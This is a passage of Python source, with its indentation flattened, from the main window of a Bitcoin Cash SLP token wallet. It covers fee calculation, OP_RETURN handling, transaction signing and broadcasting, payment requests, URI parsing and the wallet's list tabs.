raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
amount = 0
return (TYPE_SCRIPT, scriptBuffer, amount)
@staticmethod
def output_for_opreturn_rawhex(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturnError(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturnTooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput(op_return_script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
bch_outputs = []
token_output_amts = []
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if self.is_slp_wallet:
slp_amount = self.slp_amount_e.get_amount()
if amount is None and slp_amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
else:
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
try:
selected_slp_coins = []
if self.slp_token_id:
amt = slp_amount or 0
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
token_output_amts = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
for amt in token_output_amts:
# just grab a dummy address for this fee calculation - safe for imported_privkey wallets
bch_outputs.append((TYPE_ADDRESS, self.wallet.get_addresses()[0], 546))
bch_payto_outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if bch_payto_outputs and bch_payto_outputs[0][2]:
bch_outputs.extend(bch_payto_outputs)
elif self.slp_token_id and amount and not bch_payto_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not bch_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not self.slp_token_id:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if (opreturn_message != '' and opreturn_message is not None):
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.insert(0, self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.insert(0, self.output_for_opreturn_stringdata(opreturn_message))
fee = self.fee_e.get_amount() if freeze_fee else None
tx = self.wallet.make_unsigned_transaction(self.get_coins(isInvoice = False), bch_outputs, self.config, fee, mandatory_coins=selected_slp_coins)
if self.slp_token_id:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(slp_op_return_msg[1]), self.config)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughFundsSlp:
self.not_enough_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughUnfrozenFundsSlp:
self.not_enough_unfrozen_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
if not self.slp_token_id or len(token_output_amts) > 0:
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
if self.is_slp_wallet:
amount = tx.output_value() - len(token_output_amts) * 546
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self, preview=False):
bch_outputs = []
selected_slp_coins = []
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if self.slp_token_id:
if self.slp_amount_e.get_amount() == 0 or self.slp_amount_e.get_amount() is None:
self.show_message(_("No SLP token amount provided."))
return
try:
""" Guard against multiline 'Pay To' field """
if self.payto_e.is_multiline():
self.show_error(_("Too many receivers listed.\n\nCurrently this wallet only supports a single SLP token receiver."))
return
""" Guard against bad address encoding """
if not self.payto_e.payto_address:
self.show_error(_("Receiver SLP address is missing."))
return
""" Require SLPADDR prefix in 'Pay To' field. """
if networks.net.SLPADDR_PREFIX not in self.payto_e.address_string_for_slp_check:
self.show_error(_("Address provided is not in SLP Address format.\n\nThe address should be encoded using 'simpleledger:' or 'slptest:' URI prefix."))
return
amt = self.slp_amount_e.get_amount()
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
except (NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp) as e:
self.show_error(str(e))
return
isInvoice= False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
if self.slp_token_id:
self.show_error('BIP-70 Payment requests are not yet working for SLP tokens.')
return
isInvoice = True
bch_outputs.extend(self.payment_request.get_outputs())
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
if self.slp_token_id:
_type, _addr = self.payto_e.payto_address
bch_outputs.append((_type, _addr, 546))
if self.payto_e.is_alias and not self.payto_e.validated:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
coins = self.get_coins(isInvoice=isInvoice)
""" SLP: Add an additional token change output """
if self.slp_token_id:
change_addr = None
token_outputs = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
if len(token_outputs) > 1 and len(bch_outputs) < len(token_outputs):
""" start of logic copied from wallet.py """
addrs = self.wallet.get_change_addresses()[-self.wallet.gap_limit_for_change:]
if self.wallet.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.wallet.get_num_tx(addr) == 0]
if not change_addrs:
import random
change_addrs = [random.choice(addrs)]
change_addr = change_addrs[0]
elif len(change_addrs) > 1:
change_addr = change_addrs[1]
else:
change_addr = change_addrs[0]
elif coins:
change_addr = coins[0]['address']
else:
change_addr = self.wallet.get_addresses()[0]
bch_outputs.append((TYPE_ADDRESS, change_addr, 546))
# add normal BCH amounts
if not self.payment_request and self.amount_e.get_amount():
bch_outputs.extend(self.payto_e.get_outputs(self.max_button.isChecked()))
""" Only Allow OP_RETURN if SLP is disabled. """
if not self.slp_token_id:
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not bch_outputs:
self.show_error(_('Enter receiver address (No BCH outputs).'))
return
for _type, addr, amount in bch_outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
return bch_outputs, fee, label, coins, selected_slp_coins
_cointext_popup_kill_tab_changed_connection = None
def do_cointext(self):
''' This is called by the cointext button 'clicked' signal and it
initiates the processing of the cointext URL. This should only be
called if self.payto_e.cointext is not None, otherwise it will do
nothing. '''
if self.payto_e.cointext and not self.payment_request:
if self.gui_object.warn_if_no_network(self):
return
phone = self.payto_e.cointext
sats = self.amount_e.get_amount()
if sats:
url = "https://pay.cointext.io/p/{}/{}".format(phone, sats)
def get_cointext_pr():
# Runs in thread
self.print_error("CoinText URL", url)
pr = paymentrequest.get_payment_request(url) # raises on error
return pr
def on_success(pr):
# Runs in main thread
if pr:
if pr.error:
self.print_error("CoinText ERROR", pr.error)
self.show_error(_("There was an error processing the CoinText. Please check the phone number and try again."))
return
self.print_error("CoinText RESULT", repr(pr))
self.prepare_for_payment_request()
def show_popup():
if not self.send_button.isVisible():
# likely a watching-only wallet, in which case
# showing the popup label for the send button
# leads to unspecified position for the button
return
show_it = partial(
ShowPopupLabel,
text=_("Please review payment before sending CoinText"),
target=self.send_button, timeout=15000.0,
name="CoinTextPopup",
pointer_position=PopupWidget.LeftSide,
activation_hides=True, track_target=True,
dark_mode = ColorScheme.dark_scheme
)
if not self._cointext_popup_kill_tab_changed_connection:
# this ensures that if user changes tabs, the popup dies
# ... it is only connected once per instance lifetime
self._cointext_popup_kill_tab_changed_connection = self.tabs.currentChanged.connect(lambda: KillPopupLabel("CoinTextPopup"))
QTimer.singleShot(0, show_it)
pr.request_ok_callback = show_popup
self.on_pr(pr)
def on_error(exc):
self.print_error("CoinText EXCEPTION", repr(exc))
self.on_error(exc)
WaitingDialog(self.top_level_window(),
_("Retrieving CoinText info, please wait ..."),
get_cointext_pr, on_success, on_error)
else:
self.show_error(_('CoinText: Please specify an amount'))
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab(preview=preview)
if not r:
return
outputs, fee, tx_desc, coins, slp_coins = r
if self.slp_token_id:
try:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(outputs[0][1]), self.config)
except slp.SlpInvalidOutputMessage:
self.show_message(_("No token outputs available.\n\nIf you have unconfirmed tokens wait 1 confirmation or turn off 'Spend only confirmed coins' in preferences, and try again."))
return
except NotEnoughFundsSlp:
self.show_message(_("Token balance too low."))
return
except NotEnoughUnfrozenFundsSlp:
self.show_message(_("Unfrozen SLP token balance is too low. Unfreeze some of the token coins associated with with this token."))
return
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee, mandatory_coins=slp_coins)
except NotEnoughFunds:
self.show_message(_("Insufficient BCH balance"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
if self.slp_token_id:
slp_amt_str = format_satoshis_plain_nofloat(self.slp_amount_e.get_amount(), self.wallet.token_types.get(self.slp_token_id)['decimals'])
slp_name = self.wallet.token_types[self.slp_token_id]['name']
msg = [
_("BCH amount to be sent") + ": " + self.format_amount_and_units(amount),
"\nToken amount to be sent" + ": " + slp_amt_str + " " + slp_name,
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
else:
msg = [
_("\nAmount to be sent") + ": " + self.format_amount_and_units(amount),
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("\nAdditional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if (fee < (tx.estimated_size())):
msg.append(_('\nWarning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("\nYou are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("\nEnter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('\nProceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password, *, slp_coins_to_burn=None):
self.sign_tx_with_password(tx, callback, password, slp_coins_to_burn=slp_coins_to_burn)
def sign_tx_with_password(self, tx, callback, password, *, slp_coins_to_burn=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# check transaction SLP validity before signing
try:
assert SlpTransactionChecker.check_tx_slp(self.wallet, tx, coins_to_burn=slp_coins_to_burn)
except (Exception, AssertionError) as e:
self.show_warning(str(e))
return
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc, *, callback=None):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
if not ack_status:
if ack_msg == "no url":
# "no url" hard-coded in send_payment method
# it means merchant doesn't need the tx sent to him
# since he didn't specify a POST url.
# so we just broadcast and rely on that result status.
ack_msg = None
else:
return False, ack_msg
# at this point either ack_status is True or there is "no url"
# and we proceed anyway with the broadcast
status, msg = self.network.broadcast_transaction(tx)
# figure out what to return...
msg = ack_msg or msg # prefer the merchant's ack_msg over the broadcast msg, but fallback to broadcast msg if no ack_msg.
status = bool(ack_status or status) # if both broadcast and merchant ACK failed -- it's a failure. if either succeeded -- it's a success
if status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
else:
# Not a PR, just broadcast.
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previous to this we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
cb_result = False
if result:
status, msg = result
if status:
cb_result = True
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
if callback:
callback(cb_result)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
def lock_amount(self, b):
pass
# the following is now not needed since slp dust amounts are now hard coded
'''
This if-statement was added for SLP around the following two lines
in order to keep the amount field locked and Max button disabled
when the payto field is edited when a token is selected.
'''
# if self.is_slp_wallet and self.token_type_combo.currentData():
# self.amount_e.setFrozen(True)
# self.max_button.setEnabled(False)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.cointext = None
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
# Note: the below loop freezes all SLP widgets if present in the send
# tab; redo this when BIP70 supports SLP token sends. -Calin
for e in self.slp_send_tab_widgets:
e.setDisabled(True)
if self.is_slp_wallet:
# force SLP token type to 0 for payment requests
self.token_type_combo.setCurrentIndex(0)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
# New! Payment requests have an optional (may not be there!) attribute
# 'request_ok_callback' which takes 0 args and is called on request ok
# This facility was needed to do the CoinTextPopup label properly.
cb = getattr(self.payment_request, 'request_ok_callback', None)
if callable(cb):
cb()
def payment_request_error(self):
request_error = (self.payment_request and self.payment_request.error) or ''
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False, detail_text=request_error)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
self.do_clear()
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
if 'ms-python' in URI: # this is needed for visual studio code debugger
return
self.show_error(_('Invalid Address URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
scheme = out.get('scheme')
address = out.get('address')
amounts = out.get('amounts')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(URI.split('?')[0])
if message:
self.message_e.setText(message)
if amounts:
if scheme == networks.net.CASHADDR_PREFIX and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif self.is_slp_wallet and scheme == networks.net.SLPADDR_PREFIX:
# pick first token in amounts
tokenid = None
for key in amounts:
if key != 'bch':
tokenid = key
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
if index == self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(0)
from .slp_add_token_dialog import SlpAddTokenDialog
def add_token_callback():
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
SlpAddTokenDialog(self, token_id_hex = tokenid, token_name=None, allow_overwrite=None, add_callback=add_token_callback)
return
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
break
if tokenid == None and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
self.slp_extra_bch_cb.setChecked(True)
self.slp_extra_bch_cb.clicked.emit()
else:
self.show_error("Unsupported URI prefix: " + scheme)
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw is secondary precedence to op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
''' Clears the send tab, reseting its UI state to its initiatial state.'''
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
KillPopupLabel("CoinTextPopup") # just in case it was alive
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.cointext = None
self.payto_e.is_pr = False
self.opreturn_rawhex_cb.setChecked(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
self.amount_e.setHidden(False)
self.amount_label.setHidden(False)
if self.is_slp_wallet:
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
for e in self.slp_send_tab_widgets:
e.setDisabled(False)
self.slp_amount_e.setText('')
self.token_type_combo.setCurrentIndex(0)
self.on_slptok() # resets parts of the send tab to initial state
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
slp_address = ButtonsLineEdit()
slp_address.setReadOnly(True)
slp_address.addCopyButton()
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
(slp_address, Address.FMT_SLPADDR)
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
grid.addWidget(QLabel(_('SLP address')), 3, 0)
grid.addWidget(slp_address, 3, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
class ListTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if self.main_window.is_slp_wallet:
self.main_window.toggle_cashaddr(2, True)
else:
self.main_window.toggle_cashaddr(1, True)
w = ListTab()
w.main_window = self
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_slp_mgt_tab(self):
self.create_token_dialog = None
from .slp_mgt import SlpMgt
self.token_list = l = SlpMgt(self)
w = self.create_list_tab(l)
vbox = w.layout()
vbox.setSpacing(10)
create_button = b = QPushButton(_("Create New Token"))
create_button.setAutoDefault(False)
create_button.setDefault(False)
b.clicked.connect(self.show_create_token_dialog)
vbox.addWidget(create_button)
w.setLayout(vbox)
return w
def show_create_token_dialog(self):
c, u, x = self.wallet.get_balance()
bal = c + u - self.wallet.get_slp_locked_balance()
if bal < 1000:
self.receive_tab.low_balance_warning_shown = True
self.show_warning("Low BCH balance.\n\nBefore creating a new token you must add Bitcoin Cash to this wallet. We recommend a minimum of 0.0001 BCH to get started.\n\nSend BCH to the address displayed in the 'Receive' tab.")
self.show_receive_tab()
self.toggle_cashaddr(1, True)
return
try:
self.create_token_dialog.show()
self.create_token_dialog.raise_()
self.create_token_dialog.activateWindow()
except AttributeError:
self.create_token_dialog = d = SlpCreateTokenGenesisDialog(self,)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
def get_slp_coins(self, isInvoice = False):
return self.wallet.get_slp_spendable_coins(self.slp_token_id, None, self.config, isInvoice)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
